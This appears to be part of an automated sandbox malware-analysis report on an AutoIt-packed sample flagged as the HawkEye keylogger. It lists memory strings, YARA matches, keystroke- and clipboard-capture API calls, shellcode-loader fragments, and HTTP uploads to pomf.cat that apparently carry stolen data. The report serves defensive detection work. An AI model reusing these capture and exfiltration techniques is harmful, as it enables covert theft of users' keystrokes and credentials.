Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/complete/search?q=chrome&cp=6&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authus
Source: bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://www.google.com/favicon.ico
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/images/hpp/Chrome_Owned_96x96.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/images/icons/material/system/1x/email_grey600_24dp.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/images/nav_logo299.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/images/phd/px.gif
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/images/searchbox/desktop_searchbox_sprites302_hr.png
Source: bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://www.google.com/intl/en_uk/chrome/
Source: bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/intl/en_uk/chrome/application/x-msdownloadC:
Source: bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/js/bg/4sIGg4Q0MrxdMwjTwsyJBGUAZbljSmH8-8Fa9_hVOC0.js
Source: bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://www.google.com/search
Source: bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k
Source: vbc.exe, 00000006.00000003.717957775.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717882789.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.718069987.000000000232F000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.718028886.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717781094.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717689395.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717669606.0000000002337000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717735338.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717830836.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739322035.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739665751.00000000022BF000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739116233.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739573266.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739177781.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739468957.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739069223.00000000022C7000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739254376.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739360609.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898820172.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898386702.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898896783.000000000247F000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898673572.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898758123.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898519488.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898451200.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898604564.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898345595.0000000002487000.00000004.00000001.sdmp, bhv9842.tmp.9.dr, bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
Source: bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/xjs/_/js/k=xjs.s.en_GB.u8fwEfmm86E.O/ck=xjs.s.hyRG9kR79v8.L.I11.O/am=AAAAAABA
Source: bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/xjs/_/js/k=xjs.s.en_GB.u8fwEfmm86E.O/ck=xjs.s.hyRG9kR79v8.L.I11.O/m=IvlUe
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: bhv7420.tmp.6.dr String found in binary or memory: https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.ConsentUi.en_GB.wmTUy5P6FUM.es5.O/ck=
Source: bhv7420.tmp.6.dr String found in binary or memory: https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.bMYZ6MazNlM.
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.gstatic.com/ac/cb/cb_cbu_kickin.svg
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/1x/googlelogo_color_92x36dp.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/check_black_24dp.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/keyboard_arrow_down_grey600_24dp.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.gstatic.com/kpui/social/fb_32x32.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.gstatic.com/kpui/social/twitter_32x32.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.og2.en_US.vA2d_upwXfg.O/rt=j/m=def
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.LGkrjG2a9yI.O/rt=j/m=qabr
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.CniBF78B8Ew.L.X.O/m=qcwid/excm=qaaw
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.gstatic.com/ui/v1/activityindicator/loading_24.gif
Source: vbc.exe, 00000006.00000003.718196409.000000000232F000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.718148537.0000000002337000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739717949.00000000022C7000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739774153.00000000022BF000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898974521.0000000002487000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.899032438.000000000247F000.00000004.00000001.sdmp, bhv9842.tmp.9.dr, bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://www.msn.com/
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.msn.com/spartan/dhp?locale=en-US&market=US&enableregulatorypsm=0&enablecpsm=0&ishostisol
Source: unknown DNS traffic detected: queries for: pomf.cat
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_0092A09A recv, 5_2_0092A09A
Source: global traffic HTTP traffic detected: GET /upload.php HTTP/1.1Content-Type: multipart/form-data; boundary=--------------------8d9bbe600e4c00bHost: pomf.catConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /upload.php HTTP/1.1Content-Type: multipart/form-data; boundary=--------------------8d9bbe62af9ef5cHost: pomf.cat
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: RegAsm.exe, 00000005.00000002.935121039.00000000064D1000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.933727810.0000000002A72000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.936518834.0000000006A82000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.702552238.0000000004223000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.934256237.0000000002C8A000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.934824260.00000000049B0000.00000004.00020000.sdmp, RegAsm.exe, 00000005.00000002.934360737.0000000002CCE000.00000004.00000001.sdmp, vbc.exe, 00000006.00000000.710405266.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000006.00000002.720695334.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000006.00000000.709905577.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000000.729725775.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000002.744899042.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000000.730911698.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: RegAsm.exe, 00000005.00000002.935121039.00000000064D1000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.933727810.0000000002A72000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.936518834.0000000006A82000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.702552238.0000000004223000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.934256237.0000000002C8A000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.934824260.00000000049B0000.00000004.00020000.sdmp, RegAsm.exe, 00000005.00000002.934360737.0000000002CCE000.00000004.00000001.sdmp, vbc.exe, 00000006.00000000.710405266.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000006.00000002.720695334.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000006.00000000.709905577.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000000.729725775.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000002.744899042.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000000.730911698.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/beauty|ntpproviders equals www.yahoo.com (Yahoo)
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/food|ntpproviders equals www.yahoo.com (Yahoo)
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/health|ntpproviders equals www.yahoo.com (Yahoo)
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/makers|ntpproviders equals www.yahoo.com (Yahoo)
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/movies|ntpproviders equals www.yahoo.com (Yahoo)
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/music|ntpproviders equals www.yahoo.com (Yahoo)
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/parents|ntpproviders equals www.yahoo.com (Yahoo)
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/politics|ntpproviders equals www.yahoo.com (Yahoo)
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/style|ntpproviders equals www.yahoo.com (Yahoo)
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/tech|ntpproviders equals www.yahoo.com (Yahoo)
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/travel|ntpproviders equals www.yahoo.com (Yahoo)
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/tv|ntpproviders equals www.yahoo.com (Yahoo)
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com|ntpproviders equals www.yahoo.com (Yahoo)
Source: vbc.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: unknown HTTP traffic detected: POST /upload.php HTTP/1.1Content-Type: multipart/form-data; boundary=--------------------8d9bbe600e4c00bHost: pomf.catContent-Length: 739867Expect: 100-continueConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected HawkEye Keylogger
Source: Yara match File source: 5.0.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegAsm.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.932841819.0000000000702000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.934551459.0000000003152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.936778010.0000000004132000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.698490007.0000000000702000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.697292626.0000000000702000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.933574671.00000000029C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.934765521.00000000031EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.934844447.000000000328C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.697471372.0000000004252000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe PID: 2228, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00EF2344 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW, 1_2_00EF2344
Contains functionality for read data from the clipboard
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0040F078 OpenClipboard,GetLastError,DeleteFileW, 6_2_0040F078
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F7CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 1_2_00F7CDAC
Creates a window with clipboard capturing capabilities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 5.3.RegAsm.exe.427b8f2.1.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 5.0.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 5.0.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: HawkEye v9 Payload Author: ditekshen
Source: 5.2.RegAsm.exe.49b0345.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 5.2.RegAsm.exe.4a0834a.1.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 5.2.RegAsm.exe.4a0834a.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, type: UNPACKEDPE Matched rule: HawkEye v9 Payload Author: ditekshen
Source: 5.2.RegAsm.exe.49b0000.3.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 5.0.RegAsm.exe.700000.1.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 5.0.RegAsm.exe.700000.1.unpack, type: UNPACKEDPE Matched rule: HawkEye v9 Payload Author: ditekshen
Source: 5.3.RegAsm.exe.42235a8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 5.3.RegAsm.exe.427b8f2.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 5.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 5.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: HawkEye v9 Payload Author: ditekshen
Source: 5.3.RegAsm.exe.42235a8.2.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 5.3.RegAsm.exe.42238ed.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 5.2.RegAsm.exe.49b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 00000005.00000002.932841819.0000000000702000.00000020.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000001.00000002.934551459.0000000003152000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000001.00000002.936778010.0000000004132000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000005.00000000.698490007.0000000000702000.00000020.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000005.00000000.697292626.0000000000702000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000005.00000002.933574671.00000000029C9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000001.00000002.934765521.00000000031EA000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000001.00000002.934844447.000000000328C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000001.00000003.697471372.0000000004252000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000005.00000002.934824260.00000000049B0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: Process Memory Space: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe PID: 2228, type: MEMORYSTR Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Binary is likely a compiled AutoIt script file
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934120953.0000000000FA5000.00000002.00020000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script.
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934120953.0000000000FA5000.00000002.00020000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
AutoIt script contains suspicious strings
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe AutoIt Script: 8 = 35655668 THEN $BIN_SHELLCODE &= TSFBMFFUMPUS (IR
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe AutoIt Script: 958812 THEN LOCAL $LPSHELLCODE = $E ($B (TSFBMFFUM
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00EFE060 1_2_00EFE060
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00EFE800 1_2_00EFE800
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00EFFE40 1_2_00EFFE40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F06843 1_2_00F06843
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F7804A 1_2_00F7804A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F27006 1_2_00F27006
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F26522 1_2_00F26522
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F0710E 1_2_00F0710E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F116C4 1_2_00F116C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F08A0E 1_2_00F08A0E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F1BFE6 1_2_00F1BFE6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F1DBB5 1_2_00F1DBB5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5E0A1 5_2_04B5E0A1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5D090 5_2_04B5D090
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5DCE8 5_2_04B5DCE8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5E8D3 5_2_04B5E8D3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B51CC3 5_2_04B51CC3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B50801 5_2_04B50801
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B54998 5_2_04B54998
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B55588 5_2_04B55588
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5A1E2 5_2_04B5A1E2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B57518 5_2_04B57518
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5D950 5_2_04B5D950
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5D6B0 5_2_04B5D6B0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B57A11 5_2_04B57A11
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B58B90 5_2_04B58B90
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53398 5_2_04B53398
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5A798 5_2_04B5A798
